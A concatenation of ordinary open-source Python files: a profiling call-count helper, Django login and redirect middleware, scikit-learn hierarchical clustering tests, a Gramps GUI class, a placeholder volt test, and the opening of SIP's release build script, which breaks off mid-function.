# rewrite for the case where features changed,
# etc.
self._write()
@property
def platform_key(self):
dbapi_key = config.db.name + "_" + config.db.driver
# keep it at 2.7, 3.1, 3.2, etc. for now.
py_version = '.'.join([str(v) for v in sys.version_info[0:2]])
platform_tokens = [py_version]
platform_tokens.append(dbapi_key)
if jython:
platform_tokens.append("jython")
if pypy:
platform_tokens.append("pypy")
if win32:
platform_tokens.append("win")
_has_cext = config.requirements._has_cextensions()
platform_tokens.append(_has_cext and "cextensions" or "nocextensions")
return "_".join(platform_tokens)
def has_stats(self):
test_key = _current_test
return (
test_key in self.data and
self.platform_key in self.data[test_key]
)
def result(self, callcount):
test_key = _current_test
per_fn = self.data[test_key]
per_platform = per_fn[self.platform_key]
if 'counts' not in per_platform:
per_platform['counts'] = counts = []
else:
counts = per_platform['counts']
if 'current_count' not in per_platform:
per_platform['current_count'] = current_count = 0
else:
current_count = per_platform['current_count']
has_count = len(counts) > current_count
if not has_count:
counts.append(callcount)
if self.write:
self._write()
result = None
else:
result = per_platform['lineno'], counts[current_count]
per_platform['current_count'] += 1
return result
def replace(self, callcount):
test_key = _current_test
per_fn = self.data[test_key]
per_platform = per_fn[self.platform_key]
counts = per_platform['counts']
counts[-1] = callcount
if self.write:
self._write()
def _header(self):
return \
"# %s\n"\
"# This file is written out on a per-environment basis.\n"\
"# For each test in aaa_profiling, the corresponding function and \n"\
"# environment is located within this file. If it doesn't exist,\n"\
"# the test is skipped.\n"\
"# If a callcount does exist, it is compared to what we received. \n"\
"# assertions are raised if the counts do not match.\n"\
"# \n"\
"# To add a new callcount test, apply the function_call_count \n"\
"# decorator and re-run the tests using the --write-profiles \n"\
"# option - this file will be rewritten including the new count.\n"\
"# \n"\
"" % (self.fname)
def _read(self):
try:
profile_f = open(self.fname)
except IOError:
return
for lineno, line in enumerate(profile_f):
line = line.strip()
if not line or line.startswith("#"):
continue
test_key, platform_key, counts = line.split()
per_fn = self.data[test_key]
per_platform = per_fn[platform_key]
c = [int(count) for count in counts.split(",")]
per_platform['counts'] = c
per_platform['lineno'] = lineno + 1
per_platform['current_count'] = 0
profile_f.close()
def _write(self):
print(("Writing profile file %s" % self.fname))
profile_f = open(self.fname, "w")
profile_f.write(self._header())
for test_key in sorted(self.data):
per_fn = self.data[test_key]
profile_f.write("\n# TEST: %s\n\n" % test_key)
for platform_key in sorted(per_fn):
per_platform = per_fn[platform_key]
c = ",".join(str(count) for count in per_platform['counts'])
profile_f.write("%s %s %s\n" % (test_key, platform_key, c))
profile_f.close()
def function_call_count(variance=0.05):
"""Assert a target for a test case's function call count.
The main purpose of this assertion is to detect changes in
callcounts for various functions - the actual number is not as important.
Callcounts are stored in a file keyed to Python version and OS platform
information. This file is generated automatically for new tests,
and versioned so that unexpected changes in callcounts will be detected.
"""
def decorate(fn):
def wrap(*args, **kw):
if cProfile is None:
raise SkipTest("cProfile is not installed")
if not _profile_stats.has_stats() and not _profile_stats.write:
# run the function anyway, to support dependent tests
# (not a great idea but we have these in test_zoomark)
fn(*args, **kw)
raise SkipTest("No profiling stats available on this "
"platform for this function. Run tests with "
"--write-profiles to add statistics to %s for "
"this platform." % _profile_stats.short_fname)
gc_collect()
timespent, load_stats, fn_result = _profile(
fn, *args, **kw
)
stats = load_stats()
callcount = stats.total_calls
expected = _profile_stats.result(callcount)
if expected is None:
expected_count = None
else:
line_no, expected_count = expected
print(("Pstats calls: %d Expected %s" % (
callcount,
expected_count
)
))
stats.print_stats()
#stats.print_callers()
if expected_count:
deviance = int(callcount * variance)
failed = abs(callcount - expected_count) > deviance
if failed:
if _profile_stats.write:
_profile_stats.replace(callcount)
else:
raise AssertionError(
"Adjusted function call count %s not within %s%% "
"of expected %s. Rerun with --write-profiles to "
"regenerate this callcount."
% (
callcount, (variance * 100),
expected_count))
return fn_result
return update_wrapper(wrap, fn)
return decorate
def _profile(fn, *args, **kw):
filename = "%s.prof" % fn.__name__
def load_stats():
st = pstats.Stats(filename)
os.unlink(filename)
return st
began = time.time()
cProfile.runctx('result = fn(*args, **kw)', globals(), locals(),
filename=filename)
ended = time.time()
return ended - began, load_stats, locals()['result']
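# Hedged illustration (not part of the original module): a minimal sketch of how
# the function_call_count decorator above is typically applied to a test method.
# The class and method names are assumptions for illustration only; nothing runs
# until the test is invoked, at which point the call count is compared against
# the baseline stored by ProfileStatsFile for the current platform.
class ExampleProfiledTest(object):
    @function_call_count(variance=0.10)
    def test_example(self):
        # The decorated body is profiled with cProfile; its total call count
        # must stay within 10% of the recorded baseline (or --write-profiles
        # records a new one).
        return sum(range(100))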
|
codasus/django-blogages
|
refs/heads/master
|
blogages/libs/djangotoolbox/middleware.py
|
85
|
from django.conf import settings
from django.http import HttpResponseRedirect
from django.utils.cache import patch_cache_control
LOGIN_REQUIRED_PREFIXES = getattr(settings, 'LOGIN_REQUIRED_PREFIXES', ())
NO_LOGIN_REQUIRED_PREFIXES = getattr(settings, 'NO_LOGIN_REQUIRED_PREFIXES', ())
ALLOWED_DOMAINS = getattr(settings, 'ALLOWED_DOMAINS', None)
NON_REDIRECTED_PATHS = getattr(settings, 'NON_REDIRECTED_PATHS', ())
NON_REDIRECTED_BASE_PATHS = tuple(path.rstrip('/') + '/'
for path in NON_REDIRECTED_PATHS)
class LoginRequiredMiddleware(object):
"""
Redirects to login page if request path begins with a
LOGIN_REQUIRED_PREFIXES prefix. You can also specify
NO_LOGIN_REQUIRED_PREFIXES which take precedence.
"""
def process_request(self, request):
for prefix in NO_LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix):
return None
for prefix in LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix) and \
not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.get_full_path())
return None
class RedirectMiddleware(object):
"""
A static redirect middleware. Mostly useful for hosting providers that
automatically set up an alternative domain for your website. You might
not want anyone to access the site via those possibly well-known URLs.
"""
def process_request(self, request):
host = request.get_host().split(':')[0]
# Turn off redirects when in debug mode, running unit tests, or
# when handling an App Engine cron job.
if (settings.DEBUG or host == 'testserver' or
not ALLOWED_DOMAINS or
request.META.get('HTTP_X_APPENGINE_CRON') == 'true' or
request.path.startswith('/_ah/') or
request.path in NON_REDIRECTED_PATHS or
request.path.startswith(NON_REDIRECTED_BASE_PATHS)):
return
if host not in settings.ALLOWED_DOMAINS:
return HttpResponseRedirect('http://' + settings.ALLOWED_DOMAINS[0]
+ request.path)
class NoHistoryCacheMiddleware(object):
"""
If user is authenticated we disable browser caching of pages in history.
"""
def process_response(self, request, response):
if 'Expires' not in response and \
'Cache-Control' not in response and \
hasattr(request, 'session') and \
request.user.is_authenticated():
patch_cache_control(response,
no_store=True, no_cache=True, must_revalidate=True, max_age=0)
return response
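# Hedged illustration (not part of the original module): a minimal sketch of the
# settings these middleware classes read, expressed as a dict of example values
# rather than real module-level assignments so the constants computed above are
# not shadowed. The function name and every value are assumptions for
# illustration only.
def example_settings():
    """Return example values for the settings consumed by this module."""
    return {
        # Anonymous requests under these prefixes get redirected to login...
        'LOGIN_REQUIRED_PREFIXES': ('/dashboard/', '/account/'),
        # ...unless the path also matches one of these prefixes.
        'NO_LOGIN_REQUIRED_PREFIXES': ('/account/login/',),
        # Requests for any other host are redirected to the first entry.
        'ALLOWED_DOMAINS': ['www.example.com'],
        # Paths exempt from the host redirect (in addition to /_ah/ and cron).
        'NON_REDIRECTED_PATHS': ('/_ah/queue/deferred',),
    }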
|
hrjn/scikit-learn
|
refs/heads/master
|
sklearn/cluster/tests/test_hierarchical.py
|
33
|
"""
Several basic tests for hierarchical clustering procedures
"""
# Authors: Vincent Michel, 2010, Gael Varoquaux 2012,
# Matteo Visconti di Oleggio Castello 2014
# License: BSD 3 clause
from tempfile import mkdtemp
import shutil
from functools import partial
import numpy as np
from scipy import sparse
from scipy.cluster import hierarchy
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import ignore_warnings
from sklearn.cluster import ward_tree
from sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration
from sklearn.cluster.hierarchical import (_hc_cut, _TREE_BUILDERS,
linkage_tree)
from sklearn.feature_extraction.image import grid_to_graph
from sklearn.metrics.pairwise import PAIRED_DISTANCES, cosine_distances,\
manhattan_distances, pairwise_distances
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.neighbors.graph import kneighbors_graph
from sklearn.cluster._hierarchical import average_merge, max_merge
from sklearn.utils.fast_dict import IntFloatDict
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_warns
def test_linkage_misc():
# Misc tests on linkage
rng = np.random.RandomState(42)
X = rng.normal(size=(5, 5))
assert_raises(ValueError, AgglomerativeClustering(linkage='foo').fit, X)
assert_raises(ValueError, linkage_tree, X, linkage='foo')
assert_raises(ValueError, linkage_tree, X, connectivity=np.ones((4, 4)))
# Smoke test FeatureAgglomeration
FeatureAgglomeration().fit(X)
# test hierarchical clustering on a precomputed distances matrix
dis = cosine_distances(X)
res = linkage_tree(dis, affinity="precomputed")
assert_array_equal(res[0], linkage_tree(X, affinity="cosine")[0])
# test hierarchical clustering on a precomputed distances matrix
res = linkage_tree(X, affinity=manhattan_distances)
assert_array_equal(res[0], linkage_tree(X, affinity="manhattan")[0])
def test_structured_linkage_tree():
# Check that we obtain the correct solution for structured linkage trees.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
# Avoiding a mask with only 'True' entries
mask[4:7, 4:7] = 0
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for tree_builder in _TREE_BUILDERS.values():
children, n_components, n_leaves, parent = \
tree_builder(X.T, connectivity)
n_nodes = 2 * X.shape[1] - 1
assert_true(len(children) + n_leaves == n_nodes)
# Check that ward_tree raises a ValueError with a connectivity matrix
# of the wrong shape
assert_raises(ValueError,
tree_builder, X.T, np.ones((4, 4)))
# Check that fitting with no samples raises an error
assert_raises(ValueError,
tree_builder, X.T[:0], connectivity)
def test_unstructured_linkage_tree():
# Check that we obtain the correct solution for unstructured linkage trees.
rng = np.random.RandomState(0)
X = rng.randn(50, 100)
for this_X in (X, X[0]):
# With a specified number of clusters, just for the sake of
# raising a warning and testing the warning code
with ignore_warnings():
children, n_nodes, n_leaves, parent = assert_warns(
UserWarning, ward_tree, this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert_equal(len(children) + n_leaves, n_nodes)
for tree_builder in _TREE_BUILDERS.values():
for this_X in (X, X[0]):
with ignore_warnings():
children, n_nodes, n_leaves, parent = assert_warns(
UserWarning, tree_builder, this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert_equal(len(children) + n_leaves, n_nodes)
def test_height_linkage_tree():
# Check that the height of the results of linkage tree is sorted.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for linkage_func in _TREE_BUILDERS.values():
children, n_nodes, n_leaves, parent = linkage_func(X.T, connectivity)
n_nodes = 2 * X.shape[1] - 1
assert_true(len(children) + n_leaves == n_nodes)
def test_agglomerative_clustering_wrong_arg_memory():
# Test that an error is raised when memory is neither
# a str nor a joblib.Memory instance
rng = np.random.RandomState(0)
n_samples = 100
X = rng.randn(n_samples, 50)
memory = 5
clustering = AgglomerativeClustering(memory=memory)
assert_raises(ValueError, clustering.fit, X)
def test_agglomerative_clustering():
# Check that we obtain the correct number of clusters with
# agglomerative clustering.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
for linkage in ("ward", "complete", "average"):
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage=linkage)
clustering.fit(X)
# test caching
try:
tempdir = mkdtemp()
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity,
memory=tempdir,
linkage=linkage)
clustering.fit(X)
labels = clustering.labels_
assert_true(np.size(np.unique(labels)) == 10)
finally:
shutil.rmtree(tempdir)
# Turn caching off now
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity, linkage=linkage)
# Check that we obtain the same solution with early-stopping of the
# tree building
clustering.compute_full_tree = False
clustering.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
labels), 1)
clustering.connectivity = None
clustering.fit(X)
assert_true(np.size(np.unique(clustering.labels_)) == 10)
# Check that we raise a TypeError on dense matrices
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=sparse.lil_matrix(
connectivity.toarray()[:10, :10]),
linkage=linkage)
assert_raises(ValueError, clustering.fit, X)
# Test that using ward with another metric than euclidean raises an
# exception
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=connectivity.toarray(),
affinity="manhattan",
linkage="ward")
assert_raises(ValueError, clustering.fit, X)
# Test using another metric than euclidean works with linkage complete
for affinity in PAIRED_DISTANCES.keys():
# Compare our (structured) implementation to scipy
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=np.ones((n_samples, n_samples)),
affinity=affinity,
linkage="complete")
clustering.fit(X)
clustering2 = AgglomerativeClustering(
n_clusters=10,
connectivity=None,
affinity=affinity,
linkage="complete")
clustering2.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering2.labels_,
clustering.labels_),
1)
# Test that using a distance matrix (affinity = 'precomputed') has same
# results (with connectivity constraints)
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage="complete")
clustering.fit(X)
X_dist = pairwise_distances(X)
clustering2 = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
affinity='precomputed',
linkage="complete")
clustering2.fit(X_dist)
assert_array_equal(clustering.labels_, clustering2.labels_)
def test_ward_agglomeration():
# Check that we obtain the correct solution in a simplistic case
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=np.bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
agglo = FeatureAgglomeration(n_clusters=5, connectivity=connectivity)
agglo.fit(X)
assert_true(np.size(np.unique(agglo.labels_)) == 5)
X_red = agglo.transform(X)
assert_true(X_red.shape[1] == 5)
X_full = agglo.inverse_transform(X_red)
assert_true(np.unique(X_full[0]).size == 5)
assert_array_almost_equal(agglo.transform(X_full), X_red)
# Check that fitting with no samples raises a ValueError
assert_raises(ValueError, agglo.fit, X[:0])
def assess_same_labelling(cut1, cut2):
"""Util for comparison with scipy"""
co_clust = []
for cut in [cut1, cut2]:
n = len(cut)
k = cut.max() + 1
ecut = np.zeros((n, k))
ecut[np.arange(n), cut] = 1
co_clust.append(np.dot(ecut, ecut.T))
assert_true((co_clust[0] == co_clust[1]).all())
def test_scikit_vs_scipy():
# Test scikit linkage with full connectivity (i.e. unstructured) vs scipy
n, p, k = 10, 5, 3
rng = np.random.RandomState(0)
# Not using a lil_matrix here, just to check that non-sparse
# matrices are well handled
connectivity = np.ones((n, n))
for linkage in _TREE_BUILDERS.keys():
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out = hierarchy.linkage(X, method=linkage)
children_ = out[:, :2].astype(np.int)
children, _, n_leaves, _ = _TREE_BUILDERS[linkage](X, connectivity)
cut = _hc_cut(k, children, n_leaves)
cut_ = _hc_cut(k, children_, n_leaves)
assess_same_labelling(cut, cut_)
# Test error management in _hc_cut
assert_raises(ValueError, _hc_cut, n_leaves + 1, children, n_leaves)
def test_connectivity_propagation():
# Check that connectivity in the ward tree is propagated correctly during
# merging.
X = np.array([(.014, .120), (.014, .099), (.014, .097),
(.017, .153), (.017, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .152), (.018, .149), (.018, .144)])
connectivity = kneighbors_graph(X, 10, include_self=False)
ward = AgglomerativeClustering(
n_clusters=4, connectivity=connectivity, linkage='ward')
# If changes are not propagated correctly, fit crashes with an
# IndexError
ward.fit(X)
def test_ward_tree_children_order():
# Check that children are ordered in the same way for both structured and
# unstructured versions of ward_tree.
# test on five random datasets
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X)
out_structured = ward_tree(X, connectivity=connectivity)
assert_array_equal(out_unstructured[0], out_structured[0])
def test_ward_linkage_tree_return_distance():
# Test return_distance option on linkage and ward trees
# test that return_distance, when set to True, gives the same
# output on both structured and unstructured clustering.
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X, return_distance=True)
out_structured = ward_tree(X, connectivity=connectivity,
return_distance=True)
# get children
children_unstructured = out_unstructured[0]
children_structured = out_structured[0]
# check if we got the same clusters
assert_array_equal(children_unstructured, children_structured)
# check if the distances are the same
dist_unstructured = out_unstructured[-1]
dist_structured = out_structured[-1]
assert_array_almost_equal(dist_unstructured, dist_structured)
for linkage in ['average', 'complete']:
structured_items = linkage_tree(
X, connectivity=connectivity, linkage=linkage,
return_distance=True)[-1]
unstructured_items = linkage_tree(
X, linkage=linkage, return_distance=True)[-1]
structured_dist = structured_items[-1]
unstructured_dist = unstructured_items[-1]
structured_children = structured_items[0]
unstructured_children = unstructured_items[0]
assert_array_almost_equal(structured_dist, unstructured_dist)
assert_array_almost_equal(
structured_children, unstructured_children)
# test on the following dataset where we know the truth
# taken from scipy/cluster/tests/hierarchy_test_data.py
X = np.array([[1.43054825, -7.5693489],
[6.95887839, 6.82293382],
[2.87137846, -9.68248579],
[7.87974764, -6.05485803],
[8.24018364, -6.09495602],
[7.39020262, 8.54004355]])
# truth
linkage_X_ward = np.array([[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 9.10208346, 4.],
[7., 9., 24.7784379, 6.]])
linkage_X_complete = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.96742194, 4.],
[7., 9., 18.77445997, 6.]])
linkage_X_average = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.55832839, 4.],
[7., 9., 15.44089605, 6.]])
n_samples, n_features = np.shape(X)
connectivity_X = np.ones((n_samples, n_samples))
out_X_unstructured = ward_tree(X, return_distance=True)
out_X_structured = ward_tree(X, connectivity=connectivity_X,
return_distance=True)
# check that the labels are the same
assert_array_equal(linkage_X_ward[:, :2], out_X_unstructured[0])
assert_array_equal(linkage_X_ward[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_unstructured[4])
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_structured[4])
linkage_options = ['complete', 'average']
X_linkage_truth = [linkage_X_complete, linkage_X_average]
for (linkage, X_truth) in zip(linkage_options, X_linkage_truth):
out_X_unstructured = linkage_tree(
X, return_distance=True, linkage=linkage)
out_X_structured = linkage_tree(
X, connectivity=connectivity_X, linkage=linkage,
return_distance=True)
# check that the labels are the same
assert_array_equal(X_truth[:, :2], out_X_unstructured[0])
assert_array_equal(X_truth[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(X_truth[:, 2], out_X_unstructured[4])
assert_array_almost_equal(X_truth[:, 2], out_X_structured[4])
def test_connectivity_fixing_non_lil():
    # Non-regression test for a bug triggered when a connectivity matrix that
    # does not support item assignment is provided with more than one
    # connected component.
# create dummy data
x = np.array([[0, 0], [1, 1]])
# create a mask with several components to force connectivity fixing
m = np.array([[True, False], [False, True]])
c = grid_to_graph(n_x=2, n_y=2, mask=m)
w = AgglomerativeClustering(connectivity=c, linkage='ward')
assert_warns(UserWarning, w.fit, x)
def test_int_float_dict():
rng = np.random.RandomState(0)
keys = np.unique(rng.randint(100, size=10).astype(np.intp))
values = rng.rand(len(keys))
d = IntFloatDict(keys, values)
for key, value in zip(keys, values):
assert d[key] == value
other_keys = np.arange(50).astype(np.intp)[::2]
other_values = 0.5 * np.ones(50)[::2]
other = IntFloatDict(other_keys, other_values)
# Complete smoke test
max_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
average_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
def test_connectivity_callable():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(
connectivity=partial(kneighbors_graph, n_neighbors=3, include_self=False))
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_connectivity_ignores_diagonal():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
connectivity_include_self = kneighbors_graph(X, 3, include_self=True)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(connectivity=connectivity_include_self)
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_compute_full_tree():
# Test that the full tree is computed if n_clusters is small
rng = np.random.RandomState(0)
X = rng.randn(10, 2)
connectivity = kneighbors_graph(X, 5, include_self=False)
    # When n_clusters is small, the full tree should be built,
    # that is, the number of merges should be n_samples - 1.
agc = AgglomerativeClustering(n_clusters=2, connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert_equal(n_nodes, n_samples - 1)
    # When n_clusters is large (greater than the max of 100 and
    # 0.02 * n_samples), merging should stop once n_clusters clusters remain.
n_clusters = 101
X = rng.randn(200, 2)
connectivity = kneighbors_graph(X, 10, include_self=False)
agc = AgglomerativeClustering(n_clusters=n_clusters,
connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert_equal(n_nodes, n_samples - n_clusters)
def test_n_components():
# Test n_components returned by linkage, average and ward tree
rng = np.random.RandomState(0)
X = rng.rand(5, 5)
# Connectivity matrix having five components.
connectivity = np.eye(5)
for linkage_func in _TREE_BUILDERS.values():
assert_equal(ignore_warnings(linkage_func)(X, connectivity)[1], 5)
def test_agg_n_clusters():
# Test that an error is raised when n_clusters <= 0
rng = np.random.RandomState(0)
X = rng.rand(20, 10)
for n_clus in [-1, 0]:
agc = AgglomerativeClustering(n_clusters=n_clus)
msg = ("n_clusters should be an integer greater than 0."
" %s was provided." % str(agc.n_clusters))
assert_raise_message(ValueError, msg, agc.fit, X)
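# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original test module): the basic fit
# pattern exercised by the tests above, on a small hypothetical dataset with a
# k-nearest-neighbours connectivity graph. The names reused here (np,
# kneighbors_graph, AgglomerativeClustering) come from this file's imports;
# the data and parameters are made up for illustration.
def _demo_agglomerative_sketch():
    rng = np.random.RandomState(0)
    X = rng.rand(12, 2)
    connectivity = kneighbors_graph(X, 3, include_self=False)
    model = AgglomerativeClustering(n_clusters=3, connectivity=connectivity,
                                    linkage='ward')
    model.fit(X)
    # labels_ has one entry per sample; children_ records the merges made.
    assert model.labels_.shape == (12,)
    return model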
|
ennoborg/gramps
|
refs/heads/master
|
gramps/gui/editors/displaytabs/familyattrembedlist.py
|
11
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Gramps classes
#
#-------------------------------------------------------------------------
from .attrembedlist import AttrEmbedList
#-------------------------------------------------------------------------
#
#
#
#-------------------------------------------------------------------------
class FamilyAttrEmbedList(AttrEmbedList):
def __init__(self, dbstate, uistate, track, data):
AttrEmbedList.__init__(self, dbstate, uistate, track, data)
def get_editor(self):
from .. import EditAttribute
return EditAttribute
def get_user_values(self):
return self.dbstate.db.get_family_attribute_types()
|
vmthunder/volt
|
refs/heads/master
|
volt/tests/test_volt.py
|
3
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
test_volt
----------------------------------
Tests for `volt` module.
"""
from volt.tests import base
class TestVolt(base.TestCase):
def test_something(self):
pass
|
cypod/arsenalsuite
|
refs/heads/master
|
cpp/lib/sip/build.py
|
11
|
#!/usr/bin/python
# Copyright (c) 2011 Riverbank Computing Limited <info@riverbankcomputing.com>
#
# This file is part of SIP.
#
# This copy of SIP is licensed for use under the terms of the SIP License
# Agreement. See the file LICENSE for more details.
#
# This copy of SIP may also be used under the terms of the GNU General Public
# License v2 or v3 as published by the Free Software Foundation which can be
# found in the files LICENSE-GPL2 and LICENSE-GPL3 included in this package.
#
# SIP is supplied WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
"""This script prepares a repository copy of SIP for building and does all the
work of creating a packaged release. It should be run from a Mercurial
repository or a Mercurial archive. It is not part of a packaged release.
"""
import os
import shutil
import sys
import tarfile
import zipfile
# MacHg is not on sys.path, so put it there if we find it.
MacHgPath = '/Applications/MacHg.app/Contents/Plugins/LocalMercurial'
if os.path.isdir(MacHgPath):
sys.path.append(MacHgPath)
# The files that need to be patched with the version number.
_PatchedFiles = (
('configure.py', ),
('sipgen', 'sip.h'),
('siplib', 'sip.h.in'),
('sphinx', 'conf.py'), ('sphinx', 'introduction.rst'))
# Specific files that are auto-generated and need to be cleaned.
_GeneratedFiles = (
('Makefile', ), ('sipconfig.py', ),
('sipgen', 'Makefile'), ('sipgen', 'lexer.c'), ('sipgen', 'parser.c'),
('sipgen', 'parser.h'), ('sipgen', 'sip'),
('siplib', 'Makefile'), ('siplib', 'sip.h'), ('siplib', 'siplib.c'),
('siplib', 'siplib.sbf'))
# File types that are auto-generated and need to be cleaned.
_GeneratedFileTypes = ('.pyc', '.o', '.obj', '.so', '.pyd', '.exp', '.exe',
'.gz', '.zip')
# Directories that are auto-generated and need to be cleaned.
_GeneratedDirs = (
('doc', ), )
# Files in a release.
_ReleasedFiles = ('configure.py.in', 'LICENSE', 'LICENSE-GPL2', 'LICENSE-GPL3',
'NEWS', 'README', 'sipdistutils.py', 'siputils.py')
# Directories in a release.
_ReleasedDirs = ('custom', 'sipgen', 'siplib', 'specs', 'sphinx')
# The root directory, i.e. the one containing this script.
_RootDir = os.path.dirname(os.path.abspath(__file__))
def _release_tag(ctx):
""" Get the release tag (i.e. a tag of the form x.y[.z]) converted to a
3-tuple of integers if there is one.
:param ctx:
The Mercurial change context containing the tags.
:return:
The 3-tuple of integers or None if there was no release tag.
"""
for tag in ctx.tags():
if tag != 'tip':
parts = tag.split('.')
if len(parts) == 2:
parts.append('0')
if len(parts) == 3:
major, minor, micro = parts
try:
return (int(major), int(minor), int(micro))
except ValueError:
pass
return None
def _format_changelog(ctx):
""" Format the log message for a changeset.
:param ctx:
The Mercurial change context containing the tags.
:return:
The formatted change log.
"""
from mercurial.util import datestr
log = "changeset: %s\ndate: %s\n%s" % (str(ctx), datestr(ctx.date()), ctx.description())
return log
def _get_release():
""" Get the release of the package.
:return:
A tuple of the full release name, the version number, the hexadecimal
version number and a list of changelog entries (all as strings).
"""
# The root directory should contain dot files that tell us what sort of
# package we are.
release_suffix = ''
if os.path.exists(os.path.join(_RootDir, '.hg')):
# Handle a Mercurial repository.
from mercurial import hg, ui
# Get the repository.
repo = hg.repository(ui.ui(), _RootDir)
# The last changeset is the "parent" of the working directory.
ctx = repo[None].parents()[0]
# If the one before the last changeset has a release tag then the last
# changeset refers to the tagging and not a genuine change.
before = ctx.parents()[0]
version = _release_tag(before)
if version is not None:
ctx = before
else:
release_suffix = '-snapshot-' + str(ctx)
changelog = [_format_changelog(ctx)]
# Go back through the line of the first parent to find the last
# release.
parent_version = None
parents = ctx.parents()
while len(parents) != 0:
parent_ctx = parents[0]
changelog.append(_format_changelog(parent_ctx))
parent_version = _release_tag(parent_ctx)
if parent_version is not None:
break
parents = parent_ctx.parents()
if version is None and parent_version is not None:
# This is a snapshot so work out what the next version will be
# based on the previous version.
major, minor, micro = parent_version
if ctx.branch() == 'default':
minor += 1
# This should be 0 anyway.
micro = 0
else:
micro += 1
version = (major, minor, micro)
else:
# Handle a Mercurial archive.
changelog = None
name = os.path.basename(_RootDir)
release_suffix = "-unknown"
version = None
parts = name.split('-')
if len(parts) > 1:
name = parts[-1]
if len(name) == 12:
# This is the best we can do without access to the repository.
release_suffix = '-' + name
# Format the results.
if version is None:
